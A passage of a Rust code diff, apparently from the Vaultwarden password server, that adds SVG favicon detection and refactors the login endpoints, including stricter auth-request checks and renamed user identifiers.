||||||
|
fn check_svg_after_xml_declaration(bytes: &[u8]) -> Option<&'static str> {
|
||||||
|
// Look for SVG tag within the first 1KB
|
||||||
|
if let Ok(content) = std::str::from_utf8(&bytes[..bytes.len().min(1024)]) {
|
||||||
|
if content.contains("<svg") || content.contains("<SVG") {
|
||||||
|
return Some("svg+xml");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
None
|
||||||
|
}
|
||||||
|
|
||||||
match bytes {
|
match bytes {
|
||||||
[137, 80, 78, 71, ..] => Some("png"),
|
[137, 80, 78, 71, ..] => Some("png"),
|
||||||
[0, 0, 1, 0, ..] => Some("x-icon"),
|
[0, 0, 1, 0, ..] => Some("x-icon"),
|
||||||
@@ -759,6 +628,8 @@ fn get_icon_type(bytes: &[u8]) -> Option<&'static str> {
|
|||||||
[255, 216, 255, ..] => Some("jpeg"),
|
[255, 216, 255, ..] => Some("jpeg"),
|
||||||
[71, 73, 70, 56, ..] => Some("gif"),
|
[71, 73, 70, 56, ..] => Some("gif"),
|
||||||
[66, 77, ..] => Some("bmp"),
|
[66, 77, ..] => Some("bmp"),
|
||||||
|
[60, 115, 118, 103, ..] => Some("svg+xml"), // Normal svg
|
||||||
|
[60, 63, 120, 109, 108, ..] => check_svg_after_xml_declaration(bytes), // An svg starting with <?xml
|
||||||
_ => None,
|
_ => None,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -770,6 +641,12 @@ async fn stream_to_bytes_limit(res: Response, max_size: usize) -> Result<Bytes,
|
|||||||
let mut buf = BytesMut::new();
|
let mut buf = BytesMut::new();
|
||||||
let mut size = 0;
|
let mut size = 0;
|
||||||
while let Some(chunk) = stream.next().await {
|
while let Some(chunk) = stream.next().await {
|
||||||
|
// It is possible that there might occure UnexpectedEof errors or others
|
||||||
|
// This is most of the time no issue, and if there is no chunked data anymore or at all parsing the HTML will not happen anyway.
|
||||||
|
// Therfore if chunk is an err, just break and continue with the data be have received.
|
||||||
|
if chunk.is_err() {
|
||||||
|
break;
|
||||||
|
}
|
||||||
let chunk = &chunk?;
|
let chunk = &chunk?;
|
||||||
size += chunk.len();
|
size += chunk.len();
|
||||||
buf.extend(chunk);
|
buf.extend(chunk);
|
||||||
@@ -789,7 +666,7 @@ use cookie_store::CookieStore;
|
|||||||
pub struct Jar(std::sync::RwLock<CookieStore>);
|
pub struct Jar(std::sync::RwLock<CookieStore>);
|
||||||
|
|
||||||
impl reqwest::cookie::CookieStore for Jar {
|
impl reqwest::cookie::CookieStore for Jar {
|
||||||
fn set_cookies(&self, cookie_headers: &mut dyn Iterator<Item = &header::HeaderValue>, url: &url::Url) {
|
fn set_cookies(&self, cookie_headers: &mut dyn Iterator<Item = &HeaderValue>, url: &url::Url) {
|
||||||
use cookie::{Cookie as RawCookie, ParseError as RawCookieParseError};
|
use cookie::{Cookie as RawCookie, ParseError as RawCookieParseError};
|
||||||
use time::Duration;
|
use time::Duration;
|
||||||
|
|
||||||
@@ -808,7 +685,7 @@ impl reqwest::cookie::CookieStore for Jar {
|
|||||||
cookie_store.store_response_cookies(cookies, url);
|
cookie_store.store_response_cookies(cookies, url);
|
||||||
}
|
}
|
||||||
|
|
||||||
fn cookies(&self, url: &url::Url) -> Option<header::HeaderValue> {
|
fn cookies(&self, url: &url::Url) -> Option<HeaderValue> {
|
||||||
let cookie_store = self.0.read().unwrap();
|
let cookie_store = self.0.read().unwrap();
|
||||||
let s = cookie_store
|
let s = cookie_store
|
||||||
.get_request_values(url)
|
.get_request_values(url)
|
||||||
@@ -820,7 +697,7 @@ impl reqwest::cookie::CookieStore for Jar {
|
|||||||
return None;
|
return None;
|
||||||
}
|
}
|
||||||
|
|
||||||
header::HeaderValue::from_maybe_shared(Bytes::from(s)).ok()
|
HeaderValue::from_maybe_shared(Bytes::from(s)).ok()
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -828,7 +705,7 @@ impl reqwest::cookie::CookieStore for Jar {
|
|||||||
/// The FaviconEmitter is using an optimized version of the DefaultEmitter.
|
/// The FaviconEmitter is using an optimized version of the DefaultEmitter.
|
||||||
/// This prevents emitting tags like comments, doctype and also strings between the tags.
|
/// This prevents emitting tags like comments, doctype and also strings between the tags.
|
||||||
/// But it will also only emit the tags we need and only if they have the correct attributes
|
/// But it will also only emit the tags we need and only if they have the correct attributes
|
||||||
/// Therefor parsing the HTML content is faster.
|
/// Therefore parsing the HTML content is faster.
|
||||||
use std::collections::BTreeMap;
|
use std::collections::BTreeMap;
|
||||||
|
|
||||||
#[derive(Default)]
|
#[derive(Default)]
|
||||||
|
|||||||
@@ -12,26 +12,32 @@ use crate::{
|
|||||||
core::{
|
core::{
|
||||||
accounts::{PreloginData, RegisterData, _prelogin, _register},
|
accounts::{PreloginData, RegisterData, _prelogin, _register},
|
||||||
log_user_event,
|
log_user_event,
|
||||||
two_factor::{authenticator, duo, email, enforce_2fa_policy, webauthn, yubikey},
|
two_factor::{authenticator, duo, duo_oidc, email, enforce_2fa_policy, webauthn, yubikey},
|
||||||
},
|
},
|
||||||
|
master_password_policy,
|
||||||
push::register_push_device,
|
push::register_push_device,
|
||||||
ApiResult, EmptyResult, JsonResult, JsonUpcase,
|
ApiResult, EmptyResult, JsonResult,
|
||||||
},
|
},
|
||||||
auth::{generate_organization_api_key_login_claims, ClientHeaders, ClientIp},
|
auth::{generate_organization_api_key_login_claims, ClientHeaders, ClientIp, ClientVersion},
|
||||||
db::{models::*, DbConn},
|
db::{models::*, DbConn},
|
||||||
error::MapResult,
|
error::MapResult,
|
||||||
mail, util, CONFIG,
|
mail, util, CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
pub fn routes() -> Vec<Route> {
|
pub fn routes() -> Vec<Route> {
|
||||||
routes![login, prelogin, identity_register]
|
routes![login, prelogin, identity_register, register_verification_email, register_finish]
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/connect/token", data = "<data>")]
|
#[post("/connect/token", data = "<data>")]
|
||||||
async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn: DbConn) -> JsonResult {
|
async fn login(
|
||||||
|
data: Form<ConnectData>,
|
||||||
|
client_header: ClientHeaders,
|
||||||
|
client_version: Option<ClientVersion>,
|
||||||
|
mut conn: DbConn,
|
||||||
|
) -> JsonResult {
|
||||||
let data: ConnectData = data.into_inner();
|
let data: ConnectData = data.into_inner();
|
||||||
|
|
||||||
let mut user_uuid: Option<String> = None;
|
let mut user_id: Option<UserId> = None;
|
||||||
|
|
||||||
let login_result = match data.grant_type.as_ref() {
|
let login_result = match data.grant_type.as_ref() {
|
||||||
"refresh_token" => {
|
"refresh_token" => {
|
||||||
@@ -48,7 +54,7 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
|
|||||||
_check_is_some(&data.device_name, "device_name cannot be blank")?;
|
_check_is_some(&data.device_name, "device_name cannot be blank")?;
|
||||||
_check_is_some(&data.device_type, "device_type cannot be blank")?;
|
_check_is_some(&data.device_type, "device_type cannot be blank")?;
|
||||||
|
|
||||||
_password_login(data, &mut user_uuid, &mut conn, &client_header.ip).await
|
_password_login(data, &mut user_id, &mut conn, &client_header.ip, &client_version).await
|
||||||
}
|
}
|
||||||
"client_credentials" => {
|
"client_credentials" => {
|
||||||
_check_is_some(&data.client_id, "client_id cannot be blank")?;
|
_check_is_some(&data.client_id, "client_id cannot be blank")?;
|
||||||
@@ -59,17 +65,17 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
|
|||||||
_check_is_some(&data.device_name, "device_name cannot be blank")?;
|
_check_is_some(&data.device_name, "device_name cannot be blank")?;
|
||||||
_check_is_some(&data.device_type, "device_type cannot be blank")?;
|
_check_is_some(&data.device_type, "device_type cannot be blank")?;
|
||||||
|
|
||||||
_api_key_login(data, &mut user_uuid, &mut conn, &client_header.ip).await
|
_api_key_login(data, &mut user_id, &mut conn, &client_header.ip).await
|
||||||
}
|
}
|
||||||
t => err!("Invalid type", t),
|
t => err!("Invalid type", t),
|
||||||
};
|
};
|
||||||
|
|
||||||
if let Some(user_uuid) = user_uuid {
|
if let Some(user_id) = user_id {
|
||||||
match &login_result {
|
match &login_result {
|
||||||
Ok(_) => {
|
Ok(_) => {
|
||||||
log_user_event(
|
log_user_event(
|
||||||
EventType::UserLoggedIn as i32,
|
EventType::UserLoggedIn as i32,
|
||||||
&user_uuid,
|
&user_id,
|
||||||
client_header.device_type,
|
client_header.device_type,
|
||||||
&client_header.ip.ip,
|
&client_header.ip.ip,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
@@ -80,7 +86,7 @@ async fn login(data: Form<ConnectData>, client_header: ClientHeaders, mut conn:
|
|||||||
if let Some(ev) = e.get_event() {
|
if let Some(ev) = e.get_event() {
|
||||||
log_user_event(
|
log_user_event(
|
||||||
ev.event as i32,
|
ev.event as i32,
|
||||||
&user_uuid,
|
&user_id,
|
||||||
client_header.device_type,
|
client_header.device_type,
|
||||||
&client_header.ip.ip,
|
&client_header.ip.ip,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
@@ -111,8 +117,8 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {
|
|||||||
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
||||||
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
||||||
// ---
|
// ---
|
||||||
// let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
|
// let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
|
||||||
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
|
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
|
||||||
device.save(conn).await?;
|
device.save(conn).await?;
|
||||||
|
|
||||||
let result = json!({
|
let result = json!({
|
||||||
@@ -120,16 +126,8 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {
|
|||||||
"expires_in": expires_in,
|
"expires_in": expires_in,
|
||||||
"token_type": "Bearer",
|
"token_type": "Bearer",
|
||||||
"refresh_token": device.refresh_token,
|
"refresh_token": device.refresh_token,
|
||||||
"Key": user.akey,
|
|
||||||
"PrivateKey": user.private_key,
|
|
||||||
|
|
||||||
"Kdf": user.client_kdf_type,
|
|
||||||
"KdfIterations": user.client_kdf_iter,
|
|
||||||
"KdfMemory": user.client_kdf_memory,
|
|
||||||
"KdfParallelism": user.client_kdf_parallelism,
|
|
||||||
"ResetMasterPassword": false, // TODO: according to official server seems something like: user.password_hash.is_empty(), but would need testing
|
|
||||||
"scope": scope,
|
"scope": scope,
|
||||||
"unofficialServer": true,
|
|
||||||
});
|
});
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
@@ -137,9 +135,10 @@ async fn _refresh_login(data: ConnectData, conn: &mut DbConn) -> JsonResult {
|
|||||||
|
|
||||||
async fn _password_login(
|
async fn _password_login(
|
||||||
data: ConnectData,
|
data: ConnectData,
|
||||||
user_uuid: &mut Option<String>,
|
user_id: &mut Option<UserId>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
|
client_version: &Option<ClientVersion>,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
// Validate scope
|
// Validate scope
|
||||||
let scope = data.scope.as_ref().unwrap();
|
let scope = data.scope.as_ref().unwrap();
|
||||||
@@ -153,31 +152,50 @@ async fn _password_login(
|
|||||||
|
|
||||||
// Get the user
|
// Get the user
|
||||||
let username = data.username.as_ref().unwrap().trim();
|
let username = data.username.as_ref().unwrap().trim();
|
||||||
let mut user = match User::find_by_mail(username, conn).await {
|
let Some(mut user) = User::find_by_mail(username, conn).await else {
|
||||||
Some(user) => user,
|
err!("Username or password is incorrect. Try again", format!("IP: {}. Username: {username}.", ip.ip))
|
||||||
None => err!("Username or password is incorrect. Try again", format!("IP: {}. Username: {}.", ip.ip, username)),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// Set the user_uuid here to be passed back used for event logging.
|
// Set the user_id here to be passed back used for event logging.
|
||||||
*user_uuid = Some(user.uuid.clone());
|
*user_id = Some(user.uuid.clone());
|
||||||
|
|
||||||
// Check password
|
// Check if the user is disabled
|
||||||
let password = data.password.as_ref().unwrap();
|
if !user.enabled {
|
||||||
if let Some(auth_request_uuid) = data.auth_request.clone() {
|
err!(
|
||||||
if let Some(auth_request) = AuthRequest::find_by_uuid(auth_request_uuid.as_str(), conn).await {
|
"This user has been disabled",
|
||||||
if !auth_request.check_access_code(password) {
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
err!(
|
ErrorEvent {
|
||||||
"Username or access code is incorrect. Try again",
|
event: EventType::UserFailedLogIn
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
|
||||||
ErrorEvent {
|
|
||||||
event: EventType::UserFailedLogIn,
|
|
||||||
}
|
|
||||||
)
|
|
||||||
}
|
}
|
||||||
} else {
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
let password = data.password.as_ref().unwrap();
|
||||||
|
|
||||||
|
// If we get an auth request, we don't check the user's password, but the access code of the auth request
|
||||||
|
if let Some(ref auth_request_id) = data.auth_request {
|
||||||
|
let Some(auth_request) = AuthRequest::find_by_uuid_and_user(auth_request_id, &user.uuid, conn).await else {
|
||||||
err!(
|
err!(
|
||||||
"Auth request not found. Try again.",
|
"Auth request not found. Try again.",
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
|
ErrorEvent {
|
||||||
|
event: EventType::UserFailedLogIn,
|
||||||
|
}
|
||||||
|
)
|
||||||
|
};
|
||||||
|
|
||||||
|
let expiration_time = auth_request.creation_date + chrono::Duration::minutes(5);
|
||||||
|
let request_expired = Utc::now().naive_utc() >= expiration_time;
|
||||||
|
|
||||||
|
if auth_request.user_uuid != user.uuid
|
||||||
|
|| !auth_request.approved.unwrap_or(false)
|
||||||
|
|| request_expired
|
||||||
|
|| ip.ip.to_string() != auth_request.request_ip
|
||||||
|
|| !auth_request.check_access_code(password)
|
||||||
|
{
|
||||||
|
err!(
|
||||||
|
"Username or access code is incorrect. Try again",
|
||||||
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn,
|
event: EventType::UserFailedLogIn,
|
||||||
}
|
}
|
||||||
@@ -186,34 +204,23 @@ async fn _password_login(
|
|||||||
} else if !user.check_valid_password(password) {
|
} else if !user.check_valid_password(password) {
|
||||||
err!(
|
err!(
|
||||||
"Username or password is incorrect. Try again",
|
"Username or password is incorrect. Try again",
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn,
|
event: EventType::UserFailedLogIn,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
|
|
||||||
// Change the KDF Iterations
|
// Change the KDF Iterations (only when not logging in with an auth request)
|
||||||
if user.password_iterations != CONFIG.password_iterations() {
|
if data.auth_request.is_none() && user.password_iterations != CONFIG.password_iterations() {
|
||||||
user.password_iterations = CONFIG.password_iterations();
|
user.password_iterations = CONFIG.password_iterations();
|
||||||
user.set_password(password, None, false, None);
|
user.set_password(password, None, false, None);
|
||||||
|
|
||||||
if let Err(e) = user.save(conn).await {
|
if let Err(e) = user.save(conn).await {
|
||||||
error!("Error updating user: {:#?}", e);
|
error!("Error updating user: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check if the user is disabled
|
|
||||||
if !user.enabled {
|
|
||||||
err!(
|
|
||||||
"This user has been disabled",
|
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
|
||||||
ErrorEvent {
|
|
||||||
event: EventType::UserFailedLogIn
|
|
||||||
}
|
|
||||||
)
|
|
||||||
}
|
|
||||||
|
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
if user.verified_at.is_none() && CONFIG.mail_enabled() && CONFIG.signups_verify() {
|
if user.verified_at.is_none() && CONFIG.mail_enabled() && CONFIG.signups_verify() {
|
||||||
@@ -229,11 +236,11 @@ async fn _password_login(
|
|||||||
user.login_verify_count += 1;
|
user.login_verify_count += 1;
|
||||||
|
|
||||||
if let Err(e) = user.save(conn).await {
|
if let Err(e) = user.save(conn).await {
|
||||||
error!("Error updating user: {:#?}", e);
|
error!("Error updating user: {e:#?}");
|
||||||
}
|
}
|
||||||
|
|
||||||
if let Err(e) = mail::send_verify_email(&user.email, &user.uuid).await {
|
if let Err(e) = mail::send_verify_email(&user.email, &user.uuid).await {
|
||||||
error!("Error auto-sending email verification email: {:#?}", e);
|
error!("Error auto-sending email verification email: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -241,7 +248,7 @@ async fn _password_login(
|
|||||||
// We still want the login to fail until they actually verified the email address
|
// We still want the login to fail until they actually verified the email address
|
||||||
err!(
|
err!(
|
||||||
"Please verify your email before trying again.",
|
"Please verify your email before trying again.",
|
||||||
format!("IP: {}. Username: {}.", ip.ip, username),
|
format!("IP: {}. Username: {username}.", ip.ip),
|
||||||
ErrorEvent {
|
ErrorEvent {
|
||||||
event: EventType::UserFailedLogIn
|
event: EventType::UserFailedLogIn
|
||||||
}
|
}
|
||||||
@@ -250,11 +257,11 @@ async fn _password_login(
|
|||||||
|
|
||||||
let (mut device, new_device) = get_device(&data, conn, &user).await;
|
let (mut device, new_device) = get_device(&data, conn, &user).await;
|
||||||
|
|
||||||
let twofactor_token = twofactor_auth(&user, &data, &mut device, ip, conn).await?;
|
let twofactor_token = twofactor_auth(&user, &data, &mut device, ip, client_version, conn).await?;
|
||||||
|
|
||||||
if CONFIG.mail_enabled() && new_device {
|
if CONFIG.mail_enabled() && new_device {
|
||||||
if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device.name).await {
|
if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device).await {
|
||||||
error!("Error sending new device email: {:#?}", e);
|
error!("Error sending new device email: {e:#?}");
|
||||||
|
|
||||||
if CONFIG.require_device_email() {
|
if CONFIG.require_device_email() {
|
||||||
err!(
|
err!(
|
||||||
@@ -278,10 +285,12 @@ async fn _password_login(
|
|||||||
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
||||||
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
||||||
// ---
|
// ---
|
||||||
// let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
|
// let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
|
||||||
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
|
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
|
||||||
device.save(conn).await?;
|
device.save(conn).await?;
|
||||||
|
|
||||||
|
let master_password_policy = master_password_policy(&user, conn).await;
|
||||||
|
|
||||||
let mut result = json!({
|
let mut result = json!({
|
||||||
"access_token": access_token,
|
"access_token": access_token,
|
||||||
"expires_in": expires_in,
|
"expires_in": expires_in,
|
||||||
@@ -295,9 +304,11 @@ async fn _password_login(
|
|||||||
"KdfIterations": user.client_kdf_iter,
|
"KdfIterations": user.client_kdf_iter,
|
||||||
"KdfMemory": user.client_kdf_memory,
|
"KdfMemory": user.client_kdf_memory,
|
||||||
"KdfParallelism": user.client_kdf_parallelism,
|
"KdfParallelism": user.client_kdf_parallelism,
|
||||||
"ResetMasterPassword": false,// TODO: Same as above
|
"ResetMasterPassword": false, // TODO: Same as above
|
||||||
|
"ForcePasswordReset": false,
|
||||||
|
"MasterPasswordPolicy": master_password_policy,
|
||||||
|
|
||||||
"scope": scope,
|
"scope": scope,
|
||||||
"unofficialServer": true,
|
|
||||||
"UserDecryptionOptions": {
|
"UserDecryptionOptions": {
|
||||||
"HasMasterPassword": !user.password_hash.is_empty(),
|
"HasMasterPassword": !user.password_hash.is_empty(),
|
||||||
"Object": "userDecryptionOptions"
|
"Object": "userDecryptionOptions"
|
||||||
@@ -308,13 +319,13 @@ async fn _password_login(
|
|||||||
result["TwoFactorToken"] = Value::String(token);
|
result["TwoFactorToken"] = Value::String(token);
|
||||||
}
|
}
|
||||||
|
|
||||||
info!("User {} logged in successfully. IP: {}", username, ip.ip);
|
info!("User {username} logged in successfully. IP: {}", ip.ip);
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn _api_key_login(
|
async fn _api_key_login(
|
||||||
data: ConnectData,
|
data: ConnectData,
|
||||||
user_uuid: &mut Option<String>,
|
user_id: &mut Option<UserId>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
@@ -323,7 +334,7 @@ async fn _api_key_login(
|
|||||||
|
|
||||||
// Validate scope
|
// Validate scope
|
||||||
match data.scope.as_ref().unwrap().as_ref() {
|
match data.scope.as_ref().unwrap().as_ref() {
|
||||||
"api" => _user_api_key_login(data, user_uuid, conn, ip).await,
|
"api" => _user_api_key_login(data, user_id, conn, ip).await,
|
||||||
"api.organization" => _organization_api_key_login(data, conn, ip).await,
|
"api.organization" => _organization_api_key_login(data, conn, ip).await,
|
||||||
_ => err!("Scope not supported"),
|
_ => err!("Scope not supported"),
|
||||||
}
|
}
|
||||||
@@ -331,23 +342,22 @@ async fn _api_key_login(
|
|||||||
|
|
||||||
async fn _user_api_key_login(
|
async fn _user_api_key_login(
|
||||||
data: ConnectData,
|
data: ConnectData,
|
||||||
user_uuid: &mut Option<String>,
|
user_id: &mut Option<UserId>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
// Get the user via the client_id
|
// Get the user via the client_id
|
||||||
let client_id = data.client_id.as_ref().unwrap();
|
let client_id = data.client_id.as_ref().unwrap();
|
||||||
let client_user_uuid = match client_id.strip_prefix("user.") {
|
let Some(client_user_id) = client_id.strip_prefix("user.") else {
|
||||||
Some(uuid) => uuid,
|
err!("Malformed client_id", format!("IP: {}.", ip.ip))
|
||||||
None => err!("Malformed client_id", format!("IP: {}.", ip.ip)),
|
|
||||||
};
|
};
|
||||||
let user = match User::find_by_uuid(client_user_uuid, conn).await {
|
let client_user_id: UserId = client_user_id.into();
|
||||||
Some(user) => user,
|
let Some(user) = User::find_by_uuid(&client_user_id, conn).await else {
|
||||||
None => err!("Invalid client_id", format!("IP: {}.", ip.ip)),
|
err!("Invalid client_id", format!("IP: {}.", ip.ip))
|
||||||
};
|
};
|
||||||
|
|
||||||
// Set the user_uuid here to be passed back used for event logging.
|
// Set the user_id here to be passed back used for event logging.
|
||||||
*user_uuid = Some(user.uuid.clone());
|
*user_id = Some(user.uuid.clone());
|
||||||
|
|
||||||
// Check if the user is disabled
|
// Check if the user is disabled
|
||||||
if !user.enabled {
|
if !user.enabled {
|
||||||
@@ -376,8 +386,8 @@ async fn _user_api_key_login(
|
|||||||
|
|
||||||
if CONFIG.mail_enabled() && new_device {
|
if CONFIG.mail_enabled() && new_device {
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device.name).await {
|
if let Err(e) = mail::send_new_device_logged_in(&user.email, &ip.ip.to_string(), &now, &device).await {
|
||||||
error!("Error sending new device email: {:#?}", e);
|
error!("Error sending new device email: {e:#?}");
|
||||||
|
|
||||||
if CONFIG.require_device_email() {
|
if CONFIG.require_device_email() {
|
||||||
err!(
|
err!(
|
||||||
@@ -397,8 +407,8 @@ async fn _user_api_key_login(
|
|||||||
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
// Because this might get used in the future, and is add by the Bitwarden Server, lets keep it, but then commented out
|
||||||
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
// See: https://github.com/dani-garcia/vaultwarden/issues/4156
|
||||||
// ---
|
// ---
|
||||||
// let orgs = UserOrganization::find_confirmed_by_user(&user.uuid, conn).await;
|
// let members = Membership::find_confirmed_by_user(&user.uuid, conn).await;
|
||||||
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec);
|
let (access_token, expires_in) = device.refresh_tokens(&user, scope_vec, data.client_id);
|
||||||
device.save(conn).await?;
|
device.save(conn).await?;
|
||||||
|
|
||||||
info!("User {} logged in successfully via API key. IP: {}", user.email, ip.ip);
|
info!("User {} logged in successfully via API key. IP: {}", user.email, ip.ip);
|
||||||
@@ -416,9 +426,8 @@ async fn _user_api_key_login(
|
|||||||
"KdfIterations": user.client_kdf_iter,
|
"KdfIterations": user.client_kdf_iter,
|
||||||
"KdfMemory": user.client_kdf_memory,
|
"KdfMemory": user.client_kdf_memory,
|
||||||
"KdfParallelism": user.client_kdf_parallelism,
|
"KdfParallelism": user.client_kdf_parallelism,
|
||||||
"ResetMasterPassword": false, // TODO: Same as above
|
"ResetMasterPassword": false, // TODO: according to official server seems something like: user.password_hash.is_empty(), but would need testing
|
||||||
"scope": "api",
|
"scope": "api",
|
||||||
"unofficialServer": true,
|
|
||||||
});
|
});
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
@@ -427,13 +436,12 @@ async fn _user_api_key_login(
|
|||||||
async fn _organization_api_key_login(data: ConnectData, conn: &mut DbConn, ip: &ClientIp) -> JsonResult {
|
async fn _organization_api_key_login(data: ConnectData, conn: &mut DbConn, ip: &ClientIp) -> JsonResult {
|
||||||
// Get the org via the client_id
|
// Get the org via the client_id
|
||||||
let client_id = data.client_id.as_ref().unwrap();
|
let client_id = data.client_id.as_ref().unwrap();
|
||||||
let org_uuid = match client_id.strip_prefix("organization.") {
|
let Some(org_id) = client_id.strip_prefix("organization.") else {
|
||||||
Some(uuid) => uuid,
|
err!("Malformed client_id", format!("IP: {}.", ip.ip))
|
||||||
None => err!("Malformed client_id", format!("IP: {}.", ip.ip)),
|
|
||||||
};
|
};
|
||||||
let org_api_key = match OrganizationApiKey::find_by_org_uuid(org_uuid, conn).await {
|
let org_id: OrganizationId = org_id.to_string().into();
|
||||||
Some(org_api_key) => org_api_key,
|
let Some(org_api_key) = OrganizationApiKey::find_by_org_uuid(&org_id, conn).await else {
|
||||||
None => err!("Invalid client_id", format!("IP: {}.", ip.ip)),
|
err!("Invalid client_id", format!("IP: {}.", ip.ip))
|
||||||
};
|
};
|
||||||
|
|
||||||
// Check API key.
|
// Check API key.
|
||||||
@@ -450,7 +458,6 @@ async fn _organization_api_key_login(data: ConnectData, conn: &mut DbConn, ip: &
|
|||||||
"expires_in": 3600,
|
"expires_in": 3600,
|
||||||
"token_type": "Bearer",
|
"token_type": "Bearer",
|
||||||
"scope": "api.organization",
|
"scope": "api.organization",
|
||||||
"unofficialServer": true,
|
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -480,6 +487,7 @@ async fn twofactor_auth(
|
|||||||
data: &ConnectData,
|
data: &ConnectData,
|
||||||
device: &mut Device,
|
device: &mut Device,
|
||||||
ip: &ClientIp,
|
ip: &ClientIp,
|
||||||
|
client_version: &Option<ClientVersion>,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> ApiResult<Option<String>> {
|
) -> ApiResult<Option<String>> {
|
||||||
let twofactors = TwoFactor::find_by_user(&user.uuid, conn).await;
|
let twofactors = TwoFactor::find_by_user(&user.uuid, conn).await;
|
||||||
@@ -490,14 +498,19 @@ async fn twofactor_auth(
|
|||||||
return Ok(None);
|
return Ok(None);
|
||||||
}
|
}
|
||||||
|
|
||||||
TwoFactorIncomplete::mark_incomplete(&user.uuid, &device.uuid, &device.name, ip, conn).await?;
|
TwoFactorIncomplete::mark_incomplete(&user.uuid, &device.uuid, &device.name, device.atype, ip, conn).await?;
|
||||||
|
|
||||||
let twofactor_ids: Vec<_> = twofactors.iter().map(|tf| tf.atype).collect();
|
let twofactor_ids: Vec<_> = twofactors.iter().map(|tf| tf.atype).collect();
|
||||||
let selected_id = data.two_factor_provider.unwrap_or(twofactor_ids[0]); // If we aren't given a two factor provider, assume the first one
|
let selected_id = data.two_factor_provider.unwrap_or(twofactor_ids[0]); // If we aren't given a two factor provider, assume the first one
|
||||||
|
|
||||||
let twofactor_code = match data.two_factor_token {
|
let twofactor_code = match data.two_factor_token {
|
||||||
Some(ref code) => code,
|
Some(ref code) => code,
|
||||||
None => err_json!(_json_err_twofactor(&twofactor_ids, &user.uuid, conn).await?, "2FA token not provided"),
|
None => {
|
||||||
|
err_json!(
|
||||||
|
_json_err_twofactor(&twofactor_ids, &user.uuid, data, client_version, conn).await?,
|
||||||
|
"2FA token not provided"
|
||||||
|
)
|
||||||
|
}
|
||||||
};
|
};
|
||||||
|
|
||||||
let selected_twofactor = twofactors.into_iter().find(|tf| tf.atype == selected_id && tf.enabled);
|
let selected_twofactor = twofactors.into_iter().find(|tf| tf.atype == selected_id && tf.enabled);
|
||||||
@@ -514,10 +527,26 @@ async fn twofactor_auth(
|
|||||||
